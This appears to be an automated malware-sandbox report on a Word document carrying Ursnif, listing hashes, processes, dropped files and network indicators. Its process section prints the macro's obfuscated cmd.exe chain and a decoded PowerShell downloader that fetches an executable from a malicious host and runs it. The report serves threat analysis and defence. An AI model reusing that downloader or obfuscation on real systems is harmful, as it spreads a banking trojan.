analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Segars_Realty.doc

Full analysis: https://app.any.run/tasks/83df1980-c5f4-4501-b83c-aa01d07fbdc3
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: December 15, 2018, 00:21:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
gozi
ursnif
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 09:03:00 2018, Last Saved Time/Date: Fri Dec 14 09:03:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 10, Security: 0
MD5:

60EBF3483B7A15F0D41F4341AC7FC967

SHA1:

0486C1525A345DB569A6801BABEA509F50E3F77A

SHA256:

88E97A5F1DC2248EEEB962FEB216AFEFB7A4B7A8BD2425AFF780907156B3D39F

SSDEEP:

1536:2ocn1kp59gxBK85fBVt59sWtngpJnYh+a9e:L41k/W48btjsWtngPnY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2932)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2932)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2684)
    • URSNIF was detected

      • powershell.exe (PID: 2352)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2352)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4048)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2932)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2932)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:14 09:03:00
ModifyDate: 2018:12:14 09:03:00
Pages: 1
Words: 1
Characters: 10
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 10
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
4
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Segars_Realty.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4048c:\kYGdijCDijA\IJpDfUD\aHnQsPbjSzZ\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set PU=KAZGmHAmlUqLEfRBIJANo5 \t?,a$n}'/SsCr0{Wx-Yc;DpV3XvPhb@k+)QyjF8g.=w(i2eu:dz&&for %c in (28,52,17,66,65,31,35,68,49,31,44,28,53,68,73,65,29,70,66,41,20,53,60,70,43,24,22,19,70,24,64,39,70,53,35,8,68,70,29,24,44,28,60,20,36,65,31,52,24,24,46,72,32,32,59,71,8,27,66,29,70,34,34,70,64,43,20,7,32,24,59,43,8,27,7,32,13,36,70,34,34,36,64,46,52,46,25,8,65,66,59,63,40,62,64,24,55,29,31,64,33,46,8,68,24,67,31,54,31,57,44,28,61,58,8,65,31,58,33,24,31,44,28,74,7,27,22,65,22,31,48,21,69,31,44,28,35,60,29,65,31,10,16,58,31,44,28,29,27,47,65,28,70,29,50,72,24,70,7,46,56,31,23,31,56,28,74,7,27,56,31,64,70,40,70,31,44,13,20,36,70,27,43,52,67,28,42,73,14,22,68,29,22,28,60,20,36,57,38,24,36,59,38,28,53,68,73,64,45,20,66,29,8,20,27,73,61,68,8,70,67,28,42,73,14,26,22,28,29,27,47,57,44,28,66,43,52,65,31,3,51,74,31,44,16,13,22,67,67,3,70,24,41,16,24,70,7,22,28,29,27,47,57,64,8,70,29,63,24,52,22,41,63,70,22,62,37,37,37,37,57,22,38,16,29,50,20,55,70,41,16,24,70,7,22,28,29,27,47,44,28,53,39,33,65,31,42,51,15,31,44,53,36,70,27,55,44,30,30,43,27,24,43,52,38,30,30,28,53,60,16,65,31,52,0,47,31,44,77)do set DRe0=!DRe0!!PU:~%c,1!&&if %c==77 powershell "!DRe0:*DRe0!=!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2684CmD /V:ON/C"set PU=KAZGmHAmlUqLEfRBIJANo5 \t?,a$n}'/SsCr0{Wx-Yc;DpV3XvPhb@k+)QyjF8g.=w(i2eu:dz&&for %c in (28,52,17,66,65,31,35,68,49,31,44,28,53,68,73,65,29,70,66,41,20,53,60,70,43,24,22,19,70,24,64,39,70,53,35,8,68,70,29,24,44,28,60,20,36,65,31,52,24,24,46,72,32,32,59,71,8,27,66,29,70,34,34,70,64,43,20,7,32,24,59,43,8,27,7,32,13,36,70,34,34,36,64,46,52,46,25,8,65,66,59,63,40,62,64,24,55,29,31,64,33,46,8,68,24,67,31,54,31,57,44,28,61,58,8,65,31,58,33,24,31,44,28,74,7,27,22,65,22,31,48,21,69,31,44,28,35,60,29,65,31,10,16,58,31,44,28,29,27,47,65,28,70,29,50,72,24,70,7,46,56,31,23,31,56,28,74,7,27,56,31,64,70,40,70,31,44,13,20,36,70,27,43,52,67,28,42,73,14,22,68,29,22,28,60,20,36,57,38,24,36,59,38,28,53,68,73,64,45,20,66,29,8,20,27,73,61,68,8,70,67,28,42,73,14,26,22,28,29,27,47,57,44,28,66,43,52,65,31,3,51,74,31,44,16,13,22,67,67,3,70,24,41,16,24,70,7,22,28,29,27,47,57,64,8,70,29,63,24,52,22,41,63,70,22,62,37,37,37,37,57,22,38,16,29,50,20,55,70,41,16,24,70,7,22,28,29,27,47,44,28,53,39,33,65,31,42,51,15,31,44,53,36,70,27,55,44,30,30,43,27,24,43,52,38,30,30,28,53,60,16,65,31,52,0,47,31,44,77)do set DRe0=!DRe0!!PU:~%c,1!&&if %c==77 powershell "!DRe0:*DRe0!=!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2352powershell "$hJw='CiX';$bid=new-object Net.WebClient;$jor='http://yulawnesse.com/tyclam/fressr.php?l=wygx8.tkn'.Split('@');$FQl='QSt';$zma = '352';$Cjn='qIQ';$naV=$env:temp+'\'+$zma+'.exe';foreach($YdR in $jor){try{$bid.DownloadFile($YdR, $naV);$wch='GPz';If ((Get-Item $naV).length -ge 80000) {Invoke-Item $naV;$bWS='YPB';break;}}catch{}}$bjI='hKV';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 411
Read events
948
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6AA1.tmp.cvr
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F71D665B.wmf
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4432AC21.wmf
MD5:
SHA256:
2352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XRI4OAYDZW50S7LJ1R0D.temp
MD5:
SHA256:
2352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247986.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6474936BCF9E0E40D986D76CB8B97569
SHA256:A429E08BF13A763B1E1B56C70E9C488FD3A3D63556417F9C15A5F53B8F3D1253
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:F189662792140C871EAF5D8F25833E63
SHA256:35C8930063075DCBA3F6150781751F6BC6EE35EBCFB314B8088B138B54E3367D
2352powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$gars_Realty.docpgc
MD5:7E10BD0749259708BB646C75BA4DF4C2
SHA256:838E9C26801A0F0848C6C54AF04A75058851D10E124C3D7B11CAB7FDFEDE664B
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\422974A0.wmfwmf
MD5:B1620CF63C1925163DECBC61D1EE627E
SHA256:075C9EFC70BAA688B8E89485650F5CA99F53C290D547D4B325C9421A94613D30
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2352
powershell.exe
GET
404
78.155.220.222:80
http://yulawnesse.com/tyclam/fressr.php?l=wygx8.tkn
RU
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2352
powershell.exe
78.155.220.222:80
yulawnesse.com
OOO Network of data-centers Selectel
RU
malicious
172.217.21.238:80
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
yulawnesse.com
  • 78.155.220.222
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info